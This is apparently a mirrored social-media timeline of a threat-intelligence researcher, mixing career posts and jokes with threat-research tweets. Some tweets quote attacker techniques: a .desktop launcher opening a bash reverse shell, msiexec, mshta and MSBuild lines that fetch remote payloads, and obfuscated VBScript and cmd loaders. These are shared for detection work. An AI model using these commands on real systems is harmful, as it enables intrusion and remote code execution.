Nick Carr Profile Banner
Nick Carr Profile
Nick Carr

@ItsReallyNick

Followers
38,475
Following
3,541
Media
2,135
Statuses
12,146

Lead, Cyber Crime Intelligence @Microsoft ☠🏛️ Former Incident Response + Threat Research @Mandiant 🦅 Former Chief Technical Analyst @CISAgov 🛡️

Virginia, USA
Joined September 2009
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
Pinned Tweet
@ItsReallyNick
Nick Carr
1 month
i’m legit amped about aligning with all of the “tip of the spear” teams under the CISO this part of the public “secure futures” update is a pretty nice acknowledgment of threat intel impact let’s go! come join us: 🕵️ 👻
6
12
56
@ItsReallyNick
Nick Carr
4 years
🆕 Job Update: I'm joining @Microsoft ! On the #MSTIC R&D team: ☁️🏹hunting & investigations in the cloud ( #AzureSentinel , @Office365 ) 🎯✍️🏽writing detections for several platforms 👥🎁community-based research & sharing 🛡️🤲🏽protecting those who need it the most #DefendingDemocracy
98
54
945
@ItsReallyNick
Nick Carr
3 years
So you want to talk about the massive software supply chain intrusion & the most carefully-planned, complex espionage I’ve ever helped uncover? Start here: 🤩 But then what?? Let’s talk about some post-compromise techniques...
7
356
924
@ItsReallyNick
Nick Carr
5 years
We found the full CARBANAK source code & previously unseen plugins. Our #FLARE team spent 500 hours analyzing the 100,000+ lines of code. @mykill & @jtbennettjr just dropped day 1 of their 4-part blog series: Source code linked in blog. #CarbanakWeek 🦈💳
Tweet media one
15
454
797
@ItsReallyNick
Nick Carr
3 years
Tweet media one
6
112
675
@ItsReallyNick
Nick Carr
2 years
The 10 ransomware gangs you need to watch for in 2023
Tweet media one
24
87
585
@ItsReallyNick
Nick Carr
7 years
@patrickwardle @lemiorhan @AppleSupport @Apple Pretty sure @Apple announced the OneClick BlankRoot feature during their macOS High Sierra reveal. Here is the clip from the WWDC 2017 Keynote: 🤣
9
219
562
@ItsReallyNick
Nick Carr
11 months
How most ransomware incidents actually work 🔻 Access brokers sell access to compromised networks to ransomware-as-a-service affiliates, who conduct the intrusions. Ransomware-as-a-service affiliates prioritize targets based on intended impact or perceived profit Intrusion…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
9
165
534
@ItsReallyNick
Nick Carr
4 years
I see @Mandiant updated their ransomware/extortionware hardening doc. This continues to be my go-to free & digestible resource:
Tweet media one
@ItsReallyNick
Nick Carr
5 years
Mandiant's protection & containment strategies (direct link: ) gives insight into methods observed and defenses that have worked against interactive, post-compromise deployment of ransomware. @cglyer & I have covered this extortion trend on #StateOfTheHack
Tweet media one
3
21
68
2
147
521
@ItsReallyNick
Nick Carr
6 years
Kudos to the quiet hero who patiently reconstructed this evidence from RDP bitmap cache. It proved Human Machine Interface (HMI) access that was central to the DHS/ICS-CERT reporting, attributed to RU gov. Most good #DFIR stories are based on hours of difficult & thankless work.
Tweet media one
9
248
503
@ItsReallyNick
Nick Carr
4 years
OK so this is my last week at @Mandiant / @FireEye 😢 Here's the truth: ♥️ Joining Mandiant was the best decision of my career – the people & company have been SO good to me 🧠 Many of the brilliant minds in security are here & we have FUN every day 1/8
54
29
494
@ItsReallyNick
Nick Carr
6 years
Official statement on the root cause of the Hawaii inbound ballistic missile threat alert: “Someone clicked the wrong thing on the computer." Everyone in infosec nods.
13
158
435
@ItsReallyNick
Nick Carr
3 years
When it comes to threat intel the best way to cluster ransomware threat actors is physically together in a jail cell
14
77
449
@ItsReallyNick
Nick Carr
4 years
The difference between red teamers and unauthorized threat actors is red teamers sometimes pay their Azure bill.
12
49
421
@ItsReallyNick
Nick Carr
2 years
@christogrozev @bellingcat Checkmate. Used AI to reconstruct GRU yorkie’s identity
Tweet media one
11
19
389
@ItsReallyNick
Nick Carr
7 months
Intrusions from skilled cyber crime operators will test your technology ... and your humans.
Tweet media one
13
75
384
@ItsReallyNick
Nick Carr
6 years
Fresh APT loader technique for today's #DailyScriptlet : cs=Array(#,#,#,#,...): cmd="": For each c in cs: cmd=cmd&Chr(c): Next: cmd=cmd&vbcrlf: Execute(cmd) This is remotely loaded into memory from source phishing doc that uses renamed wscript & pubprn.vbs to load COM Scriptlet.
Tweet media one
Tweet media two
Tweet media three
4
240
383
@ItsReallyNick
Nick Carr
5 years
Attackers can check your security visibility faster than you can configure it. Here's an UNC group we track 😉 using Outlook home page (CVE-2017-11774) to check the target's attack surface and process creation & PowerShell event visibility - then sending it to domain-fronted C2.
Tweet media one
Tweet media two
Tweet media three
Tweet media four
4
121
339
@ItsReallyNick
Nick Carr
4 years
1. Attackers abuse Pastebin to host payloads. 2. Some security teams abuse Pastebin APIs to keep up with them. Glad they’ve finally put a stop to... *checks notes* the second one? 🙃
@pastebin
Pastebin
4 years
@MrJamesHemmings API access is still available - . The Scraping API has been discontinued due to active abuse by third parties for commercial purposes, such activity is prohibited by our current T&C’s, please see Section C, P.4.
8
12
22
10
104
339
@ItsReallyNick
Nick Carr
7 years
Blog post by @OsandaMalith / @m3g9tr0n : • covers creative NetNTLM/SMBRelay attack techniques - including regsvr32 🤪 • exemplifies the the value of curiosity in security research • has me questioning some other processes that make network connections...
Tweet media one
6
180
323
@ItsReallyNick
Nick Carr
6 years
On the @FireEye Advanced Practices Team, we're interested in targeted attackers using Outlook Homepage shell & persistence, made accessible by @sensepost 's ruler: There are VERY few of them detected & publicly-uploaded. Here's one:
Tweet media one
10
162
321
@ItsReallyNick
Nick Carr
5 years
What if you could magically rank strings based on their maliciousness? Now you can: 🧙‍♂️ We open sourced #StringSifter today at @DerbyCon . Built for the blue team, probably useful for red 😉 📺 WATCH @phtully @iAmThePr0blem 's talk:
5
121
303
@ItsReallyNick
Nick Carr
7 months
These red teamers are getting out-of-hand
Tweet media one
12
24
292
@ItsReallyNick
Nick Carr
6 years
"Be extremely subtle, even to the point of formlessness. Be extremely mysterious, even to the point of soundlessness." - Sun Tzu ... "Nah, bro I'm good." - this red teamer [pictured]
Tweet media one
14
100
292
@ItsReallyNick
Nick Carr
5 years
Things I didn't realize you could do with .URL files: [InternetShortcut] URL=javascript: ... Uploaded 1 hour ago: #NoShortcuts
Tweet media one
Tweet media two
7
98
283
@ItsReallyNick
Nick Carr
5 years
Please enable Network Level Authentication (NLA) for a layer of pre-auth before a connection is established. This not only reduces the terrifying #DejaBlue & #BlueKeep RDP attack surface, it's also a top ransomware protection recommendation from @Mandiant :
Tweet media one
5
123
283
@ItsReallyNick
Nick Carr
7 years
NEW: @FireEye discloses #0day used to distribute "lawful intercept" software in-the-wild. #DFIR CVE-2017-8759:
Tweet media one
Tweet media two
4
266
278
@ItsReallyNick
Nick Carr
4 years
👉🏼 “Federal investigators may be unable to readily distinguish between criminals and innocent parties engaged in intelligence gathering. Consequently, it is possible that individuals engaged in legitimate cybersecurity may become the subject of a criminal investigation.” - DOJ
10
120
268
@ItsReallyNick
Nick Carr
2 years
@taviso
Tavis Ormandy
4 years
@h4knet Yes, offensive security tools. There's a group of Mandiant people being obnoxious about it and spamming their agendas on twitter.
2
4
35
28
23
271
@ItsReallyNick
Nick Carr
7 years
One-click MS Access database code execution by @424f424f : 💥 Static VT detection at 0/59. I expect some dynamic engines will fail to launch this properly as well.
5
178
266
@ItsReallyNick
Nick Carr
3 years
We’re hiring for our cyber crime / counter-ransomware intelligence mission. Senior analyst position, some details flexible. I promise you were are working on globally unique and important capabilities.
7
115
270
@ItsReallyNick
Nick Carr
5 years
🔨A Tough Outlook for Home Page Attacks 🔗 Blog has #APT33 🇮🇷, #APT34 🇮🇷, and #UNC1194 🏴󠁵󠁳󠁯󠁨󠁿😉 home page persistence & RCE. 🔒We talk CVE-2017-11774 patch tampering in-the-wild and made a hardening guide! 😱Cool TTPs (pictured) #GuardrailsOfTheGalaxy
Tweet media one
Tweet media two
5
144
268
@ItsReallyNick
Nick Carr
4 years
#infosec ouroboros of the day: FIN7's FIN7 ATT&CK EDR eval
Tweet media one
11
88
260
@ItsReallyNick
Nick Carr
3 years
Yesterday we said an early goodbye to our awesome dog Rocket. Not just a sweet family dog – he had 12 years on the front lines: • lap-warming through many late night intrusions • had been in a SCIF 🙃 • co-authored good blogs & all bad tweets Much love to all the cyber pets!
Tweet media one
55
1
265
@ItsReallyNick
Nick Carr
5 years
New blog! This is one of my favorite adversary tradecraft write-ups this year: It's cool to see case studies written from the attacker's perspective, exploring intrusion choices made. @cglyer & I plan to have author @ramen0x3f on the next #StateOfTheHack !
4
130
261
@ItsReallyNick
Nick Carr
3 years
"Our approach to domain fronting within Azure is a great example of how the ever-changing dynamics of our world have prompted us to re-examine an important and complicated issue — and ultimately make a change." 👉 Let the data speak & reduce attack surface.
Tweet media one
7
107
261
@ItsReallyNick
Nick Carr
3 years
$1.2 billion USD or as it’s better known in the security industry 25 additional VirusTotal live hunt rules
6
17
258
@ItsReallyNick
Nick Carr
3 years
Sounds legit.
Tweet media one
50
30
256
@ItsReallyNick
Nick Carr
3 years
Name that ransomware/extortion gang - ROUND #1 . GO! Redaction, hint highlighting, and comic sans - mine. Original/spoilers in @Jon__DiMaggio 's:
Tweet media one
12
69
245
@ItsReallyNick
Nick Carr
6 years
Well that's certainly one way to launch mshta! 🧐 Please enjoy this "tasteful" cmd.exe obfuscation before @danielhbohannon melts minds in exactly 24 hours with #DOSfuscation at Black Hat Asia. Malicious CSV 🔥 uploaded today. h/t @TekDefense 0/56 on VT:
Tweet media one
Tweet media two
6
139
245
@ItsReallyNick
Nick Carr
3 years
🪙 On #GoldenSAML remediation: • Rotate the token-signing AD FS certificate in rapid succession twice 👉If only rotated once, a copy of the previous [compromised?] certificate will still be resident in Azure AD, and can still be used to forge SAML tokens
Tweet media one
3
102
247
@ItsReallyNick
Nick Carr
4 years
Critical new defenses for OAuth consent phishing: • ✅ Publisher verification [pic 1] • 📋 Customizable app consent policies [pic 2] • 🚷 Globally disallowing user consent to new multi-tenant apps from unverified publishers (on Nov 8) 👉🏼📰 Details:
Tweet media one
Tweet media two
5
91
245
@ItsReallyNick
Nick Carr
5 years
Say hello to Fedir Hladyr 👋 The senior sys admin at #FIN7 's original front company, Combi Security. He maintained their internal HipChat instance for malware & payment card sharing - and tracked the team's intrusion projects in JIRA. He puts the "organized" in organized crime.
@snlyngaas
Sean Lyngaas
5 years
FIN7's IT admin pleads guilty for role in billion-dollar cybercrime crew via @jeffstone500
0
42
75
7
80
228
@ItsReallyNick
Nick Carr
5 years
In this "everyone gets a trophy" culture, it's nice to receive an award from your co-worker that really means something. 🤣
Tweet media one
13
16
228
@ItsReallyNick
Nick Carr
6 years
Good morning. ☕️ Let's try something new. > wmic process call create > wmic path win32_process call create If you share a novel* method to launch a process via wmic – without "process "+"call "+"create " – I will DM you a personal $10 Amazon gift card, up to $100 total today.
Tweet media one
15
86
229
@ItsReallyNick
Nick Carr
1 year
I led the first Mandiant incident response engagement into an unknown financial actor that eventually became FIN7. Later discovered the CARBANAK source code. But today I got to hang with the REAL heroes from FBI Seattle who brought justice 😅 @ W perp walking his perp walk photo
Tweet media one
Tweet media two
Tweet media three
10
13
226
@ItsReallyNick
Nick Carr
7 months
tbh seems like there are easier ways to get a job at microsoft
9
16
220
@ItsReallyNick
Nick Carr
5 years
. @FireEye is responding to another intrusion into critical infrastructure from the attacker behind #TRITON . Here's a brand new blog documenting all of their TTPs (+ @MITREattack mappings): Authors @stvemillertime @danielcabaniel @NathanBrubaker @Kapellmann
1
106
214
@ItsReallyNick
Nick Carr
7 years
Invoke-Obfuscation IRL
Tweet media one
3
69
196
@ItsReallyNick
Nick Carr
7 years
Today's UAC bypass #DailyScriptlet features: • Base64 encoding – standard alphabet only – w/ bonus bash decode • @facebook CDN usage – cdn.fbsbx[.]com • hosted zip written & extracted to %temp%, launched w/ rundll32.exe VT detection (5/60): #dfir
Tweet media one
Tweet media two
Tweet media three
Tweet media four
8
127
200
@ItsReallyNick
Nick Carr
4 months
We are scouting for reverse engineering talent to contribute to Microsoft’s intelligence mission: I can’t guarantee you will understand the vast security data, but I can promise you will often be the first human defender to ever look at a certain malicious…
Tweet media one
@MalwareRE
Ramin Nafisi
4 months
MSTIC is looking for Senior Security Researchers (Malware Reverse Engineers) in the US and Australia to join our MSTIC-RE team. This is an exciting opportunity to make a tangible difference in combating Nation State (NS/APT/DHA) and ransomware threats.
0
44
91
11
77
203
@ItsReallyNick
Nick Carr
4 years
🚨💪💪🚨 “Today we took action to disrupt... #Trickbot , one of the world’s most infamous botnets and prolific distributors of #ransomware .” 🆕 legal approach: “Our case includes copyright claims against Trickbot’s malicious use of our software code” 🔗⤵️
8
63
202
@ItsReallyNick
Nick Carr
6 years
Do NOT open emails sent from It is *NOT* legitimate.
Tweet media one
13
119
198
@ItsReallyNick
Nick Carr
3 years
In honor of the @Mandiant rebrand and the kick-off of #CyberDefenseSummit (MIRcon) – I bring to you this important piece of security conference history: Video is now public for the first time 😂
37
31
197
@ItsReallyNick
Nick Carr
4 years
@cyb3rops @anthomsec Not the most technically impressive but one of the more brazen moves was a nation state threat actor using the compromised account of the lead security person to reply all to multiple email threads about the potential incident - telling everyone to stand down
7
27
194
@ItsReallyNick
Nick Carr
2 years
We've been tracking DEV-0537 since 2021 (overlaps: Lapsus$, UNC3661). Here's a comprehensive 🆕 BLOG 📰 covering observed TTPs: #MSTIC and Defender threat intel collab ➕ #DART 👻 incident response team experience from the trenches [1/3]
5
73
191
@ItsReallyNick
Nick Carr
6 years
@sixdub @malcomvetter @InvokeThreatGuy APT29 HAMMERTOSS did all the things 1. Hosted malz on compromised infra 2. Replaced wermgr.exe - awesome persistence! 3. Algorithm for new Twitter handle daily for APT29 control 4. Additional workweek cmds via GitHub steganography 5. Exfil to cloud storage
5
87
190
@ItsReallyNick
Nick Carr
6 years
Reminder to check all your #PowerPoint slides. Some have hyperlink mouseover launch of remote MSI payload stored on @discordapp msiexec /i hxxps://cdn.discordapp[.]com/attachments/448418688190775298/455878026576789511/rak.msi /q 💾 "Faktura.ppsx" (2/60):
Tweet media one
Tweet media two
Tweet media three
13
101
187
@ItsReallyNick
Nick Carr
6 years
Found a super spicy 🌶️ take on an #IQY file (launched by Excel) while going through my file collections today. • 0 static VT detections. • Creative embedded payload & remote launcher. ...turns out it's my coworker @MrUn1k0d3r and he's released a POC:
Tweet media one
Tweet media two
Tweet media three
@MrUn1k0d3r
Mr.Un1k0d3r
6 years
POC with the embedded DLL. IQY file Remote Payload #redteam #pentest
6
97
178
6
80
184
@ItsReallyNick
Nick Carr
4 years
It's been awesome to witness so many teams collaborating to prevent/detect malicious OAuth apps and reduce the attack surface. Excited for my small part in providing #AzureSentinel visibility into suspicious OAuth behavior & tooling. Blog soon! 🙏PwnAuth, O365-attack-toolkit, C3
Tweet media one
9
43
186
@ItsReallyNick
Nick Carr
6 years
🆕 #DailyScriptlet alert: someone just uploaded a fun custom .SCT backdoor PoC Capable VBScript utility with: 1⃣ Modular layout & launching 2⃣ Robust host recon - OS, AV, HW, compatibility checks 3⃣ HTTP comms & connection check 4⃣ File/process listing & manipulation
Tweet media one
Tweet media two
Tweet media three
Tweet media four
9
100
183
@ItsReallyNick
Nick Carr
5 years
#APT32 phishing - now with more #TweeTPs Windows.csproj & .mp4 downloaded with certutil MSBuild.exe %TEMP%\Windows.csproj /p:AssemblyName=%TEMP%\Windows.mp4 /p:ScriptFile=hxxp://139.59.30[.]109:8090/abcv /p:Key="WindowsService" Payload loaded in memory then deleted from disk
@RedDrip7
RedDrip Team
5 years
New approaches used by #OceanLotus #APT group, that leverage macro to load code hidden in the table by minimal white font and executes the downloaded payload through MSBUILD.exe. Either AES or RC4 is used for decryption. url: hxxp://139.59.30.109:8090/abcv
Tweet media one
5
112
170
4
87
184
@ItsReallyNick
Nick Carr
5 years
#StateOfTheHack streaming now ➕ podcast 🔊 @cglyer and I covered: 1⃣ Stopping new activity w/ #ManagedDefense before they dropped #SHAMOON 2⃣ #DNSpionage & @DHSgov 2⃣9⃣ #APT29 w/ @matthewdunwoody & @WylieNewmark to cover HOW then WHY they've changed the game... TAKEAWAYS: 1/n
6
68
188
@ItsReallyNick
Nick Carr
9 months
2
24
177
@ItsReallyNick
Nick Carr
5 years
Stopped using PowerShell for attacks? Seems to be working just fine for #APT32 🇻🇳 lang.ps1 uploaded yesterday (3/56): I appreciate their signature obfuscation style (pictured) The underlying backdoor here is very creative... [1/2]
Tweet media one
5
92
184
@ItsReallyNick
Nick Carr
6 years
𝙵𝙸𝙻𝙴 𝙷𝙰𝚂 𝙱𝙴𝙴𝙽 𝙳𝙰𝙼𝙴𝙶𝙴𝙳 𝙿𝙻𝙴𝙰𝚂𝙴 𝚁𝙴𝚂𝚃𝙰𝚁𝚃 𝙲𝙾𝙼𝙿𝚄𝚃𝙴𝚁 𝚃𝙾 𝙵𝙸𝚇 𝙸𝚃 (𝙴𝚛𝚛𝚘𝚛:𝟶𝚡𝟾𝟶𝟶𝟺𝚏𝚌𝟷𝟸) ☝🏻 #APT32 *still* using fake error codes to shape their victim's behavior. Require a restart for persistent in-mem backdoor = sandbox evasion
8
77
181
@ItsReallyNick
Nick Carr
2 years
When our awesome #MSTIC Russia team discovered this event unfolding in real-time 🤯, here was our crime triage on how DEV-0586's destructive malware differs from 𝘵𝘺𝘱𝘪𝘤𝘢𝘭 human-operated ransomware. "Ransom" note in the blog: - anything we missed?
Tweet media one
@MsftSecIntel
Microsoft Threat Intelligence
2 years
Microsoft identified a unique destructive malware operated by an actor tracked as DEV-0586 targeting Ukrainian organizations. Observed activity, TTPs, and IOCs shared in this new MSTIC blog. We'll update the blog as our investigation unfolds.
63
1K
2K
6
47
180
@ItsReallyNick
Nick Carr
4 years
In this guide from Checkpoint, they highlight some default sandbox values that payload developers check for [username check pictured] I’ve long argued that these make for great home computer user/host names – some extra security layers never hurt 😉
Tweet media one
6
51
177
@ItsReallyNick
Nick Carr
3 years
Disrupted a cross-cloud BEC campaign impacting hundreds of victims. Here’s a behind-the-scenes look at their custom tools & techniques There’s tons more happening to disrupt cyber crime – credit for this particular write-up goes to my coauthor @Stefan0x531
Tweet media one
3
52
182
@ItsReallyNick
Nick Carr
7 years
The definitive visual guide to #BadRabbit 1⃣ install_flash_player.exe 2⃣ infpub.dat 🐲🐲 3⃣ dispci.exe 3⃣ cscc.dat 3⃣ [A-F0-9]{4}.tmp
Tweet media one
6
145
176
@ItsReallyNick
Nick Carr
6 years
Hopefully federal agencies deemed their blue teams "mission essential." The last #shutdown provided unprecedented network signal-to-noise baselining and resulted in several teams detecting new incidents. It also helped scope a large gov IR by isolating the beaconing servers.
4
80
177
@ItsReallyNick
Nick Carr
6 years
I decided to make my own minimalist #DailyScriptlet with... a remote payload! I've also trimmed the fat (XML definition, script language tag, etc) 112 characters: <scriptlet> <registration progid="☺"> <script src=""></script> </registration> </scriptlet>
Tweet media one
2
85
176
@ItsReallyNick
Nick Carr
2 years
Announcing the rollout of security defaults to existing (pre-Oct 2019) tenants 🧑🏽‍💻🛡
Tweet media one
@Alex_T_Weinert
Alex Weinert
2 years
Time to step it up.
7
20
68
11
41
174
@ItsReallyNick
Nick Carr
6 years
"No engines detected this file" 😒 Let's change that: ^apply this #yara rule to unzipped OOXML contents as well! Pictured: "alpha.docx" @VirusTotal (0/60): Technique by @enigma0x3 :
Tweet media one
Tweet media two
Tweet media three
Tweet media four
7
98
172
@ItsReallyNick
Nick Carr
4 years
#OAuth techniques are trending again. Pictured: the time I wrote OAuth app abuse Snort rules and they actually caught the #APT28 🐻 2016 Russian election interference in-the-wild! [note the date 😉]
Tweet media one
2
35
173
@ItsReallyNick
Nick Carr
7 years
Cyber espionage is alive and well! My blog post is live: APT32 (Vietnam) targeting and TTPs: #DFIR @Mandiant
Tweet media one
Tweet media two
Tweet media three
5
103
170
@ItsReallyNick
Nick Carr
6 years
Sometimes attackers have more to say – don't forget to check your phishing documents for comments. #DFIR In-the-wild [red team] sample this week using character substitution + bitsadmin transfer + csc.exe + .Automation.dll + schtasks 👍🏽
Tweet media one
5
70
170
@ItsReallyNick
Nick Carr
7 years
@0rbz_ @Hexacorn PoC: ready, set SET Because apparently setting environment variables can be done with environment variables! set ♫=set Example 1: %♫% ☺=pow^er&&%♫% ☻=she^ll %☺%%☻% Example 2: %♫% ♥=e^r pow%♥%sh%♥:r=ll%
Tweet media one
6
97
166
@ItsReallyNick
Nick Carr
5 years
🆕 🔥 Research on PDB Paths from @stvemillertime : #DFIR primer & exploration of these wonderful artifacts. Followed by a survey of malware PDB conventions, PDB anomalies, attacker mistakes. All with attribution, including Western gov. THREAD (1/n)
Tweet media one
Tweet media two
Tweet media three
Tweet media four
5
75
167
@ItsReallyNick
Nick Carr
6 years
APT32 loves living off the land. They copy & rename legit binaries with their initial phish's macros. 🆕 macro method this week, heavy on VBS arrays, persists: C:\ProgramData\ErroLogon.exe //E:vbscript /b C:\ProgramData\Error.log Analyzed with @a_tweeter_user #AdversaryMethods
2
76
163
@ItsReallyNick
Nick Carr
6 years
Fun fact: the WMI EventFilter registered by this #DailyScriptlet for persistence leverages TargetInstance.SystemUptime to specify a launch time range (in seconds). For malware, the range is often chosen to allow the system to fully boot then launch once. Method in Vault 7 leak.
@ItsReallyNick
Nick Carr
6 years
How about a #DailyScriptlet with spicy VBS obfuscation using split, eval, and chr arithmetic Launches: 1⃣ Metasploit-style shellcode 2⃣ Registry persistent remote mshta 3⃣ WMI persistent #squiblydoo [pictured] cc: @cglyer "reg9.sct" uploaded this week:
Tweet media one
Tweet media two
Tweet media three
Tweet media four
4
35
85
2
76
165
@ItsReallyNick
Nick Carr
5 years
🚨 Coordinated Global DNS Record Manipulation Campaign @CyberAmyntas shares in-the-wild TTPs [pictured] @bread08 shows connection to #Iran 🇮🇷 We're still scoping a LARGE amount of activity. After you 2FA your domain administration portal, read the blog:
Tweet media one
Tweet media two
Tweet media three
4
111
163
@ItsReallyNick
Nick Carr
4 months
Come work with us on the core threat intelligence team: “The Microsoft Threat Intelligence Center (MSTIC) is recruiting experienced nation-state threat hunters – with highly honed threat intelligence analysis skills.” LFG: Please DM me if we have worked…
Tweet media one
@ItsReallyNick
Nick Carr
4 months
We are scouting for reverse engineering talent to contribute to Microsoft’s intelligence mission: I can’t guarantee you will understand the vast security data, but I can promise you will often be the first human defender to ever look at a certain malicious…
Tweet media one
11
77
203
3
50
162
@ItsReallyNick
Nick Carr
2 years
So I started watching Hawkeye as an escape from work. Only to find out it’s *also* about a bunch of Eastern European criminals in tracksuits with ties to fake security companies
8
6
156
@ItsReallyNick
Nick Carr
3 years
Two-factor authentication: 1⃣Something you know + 2⃣Something y̶o̶u̶ ̶h̶a̶v̶e̶ your kids are playing with 📱 while you try to finish this one thing but now you can't do it
4
30
158
@ItsReallyNick
Nick Carr
6 years
In light of the #FIN7 "Combi Security" DOJ indictment, we've released our massive technical post and indicator release: We reveal new information from @Mandiant IRs about the extent of FIN7's crimes, their innovative techniques, & how to find them today.
2
107
155
@ItsReallyNick
Nick Carr
2 years
Just knocked out the Scranton Half Marathon in some classic PA weather (35 degrees, pouring rain throughout) 🌧🏃🏻‍♂️ Still managed to get a personal record 1:43:03 @ 7:52 pace 🎉 thanks to a training plan from @BeWellDianna
Tweet media one
15
2
158
@ItsReallyNick
Nick Carr
9 months
payments.txt - seemed like a good idea at the time 😅
Tweet media one
6
35
155
@ItsReallyNick
Nick Carr
6 years
If you like to breakdown malicious scripts, I can't recommend @GCHQ 's #CyberChef enough. You can also create reusable recipes for auto-extraction & decoding of popular encoding techniques. Example: extracting shellcode from a metasploit-style PowerShell payload #DailyScriptlet
Tweet media one
Tweet media two
Tweet media three
Tweet media four
9
62
155
@ItsReallyNick
Nick Carr
4 years
Yes! #APT29 🇷🇺 invented this afaik in 2014 when we saw it first-hand ( #NoEasyBreach ). The key here is it gives timestomping capabilities. Bad guy specifies timestamps within the XML, schtasks applies them. So you can hijack/overwrite existing named scheduled tasks & be a ghost 👻
@llt4l
teafour [t4]
4 years
TIL you can create/modify scheduled tasks with schtasks.exe by importing XML. Apparently this technique was also used by APT29 and APT32. (ref: )
Tweet media one
2
22
88
3
44
157
@ItsReallyNick
Nick Carr
7 years
Pretty cool combination of techniques in the wild: • External relationship linked within XML with "soap:wsdl=" syntax • Many layers of encoding including PowerShell in VBE Uploaded an hour ago, VT Detection: 6/61:
Tweet media one
Tweet media two
Tweet media three
Tweet media four
3
92
155
@ItsReallyNick
Nick Carr
5 years
Interesting techniques in this Excel file's malicious macros: • obfuscated MSBuild payload • random launch delay • domain-based guardrail [redacted] VT (16/60): 🤔XLS author metadata: "Kyle Shockley" #GuardrailsOfTheGalaxy 💂‍♂️🛤️🌌
Tweet media one
Tweet media two
4
51
152
@ItsReallyNick
Nick Carr
6 years
Certutil execution of malicious Base64 content used by APT29 since at least 2014. @mattifestation (or @subTee ?) found/popularized the remote certutil method, loved by APT34/OilRig and many others. Our teammate @stvemillertime shows how to watch your network for it. #dailypcap
0
72
150
@ItsReallyNick
Nick Carr
4 years
Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g ⚠️ note: simple backslash URL trick 💆 know: "4D 5A" (MZ) 🔚 Result: #RevengeRAT on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]org
Tweet media one
4
55
152
@ItsReallyNick
Nick Carr
5 years
Attackers still use .IQY file extensions to execute code with Excel. It's a bit clunky on execution, but is super lightweight and easy to use multiple stage payloads. 🤷🏻‍♂️ Here's a sample using @pastebin uploaded 15 minutes ago to VT (0/55): CC: @ScumBots
Tweet media one
Tweet media two
Tweet media three
4
56
149
@ItsReallyNick
Nick Carr
3 years
"Hey, how come I don't get to work on any interesting intrusions?" said everyone who gave up too early.
9
10
146
@ItsReallyNick
Nick Carr
4 years
I know you SO many of you have had intense 2020s – but let me just tell you, I’m hitting with the heavyweights over here 🥴🥊 You cannot imagine the number of life changing events. I don’t say that to diminish what you’re going through... it’s more that I’m walking with you. ✊🏼
20
3
146
@ItsReallyNick
Nick Carr
3 years
If you want to contribute on a fun team with great data getting to ground truth on intrusions 🕵️ – especially in the cloud 😶‍🌫️ – Microsoft's Detection and Response Team ( #DART 👻) is hiring: #DFIR ... also their swag game is on point 🎯👌
Tweet media one
5
38
145
@ItsReallyNick
Nick Carr
7 years
Nice re-analysis of the 19,000 #APT28 shortened URLs used for OAuth social engineering: Love the animation:
4
97
138
@ItsReallyNick
Nick Carr
1 year
stop hakrs ❤️‍🔥
Tweet media one
18
1
141
@ItsReallyNick
Nick Carr
5 years
Malicious shortcuts - not just for Windows anymore? On Linux, drop any code into a .desktop file: [Desktop Entry] Name=Emacs Exec=/bin/bash -i >& /dev/tcp/[RHOST]/[RPORT] 0>&1 Icon= Terminal=false Type=Application #NoShortcuts [1/2]
7
47
141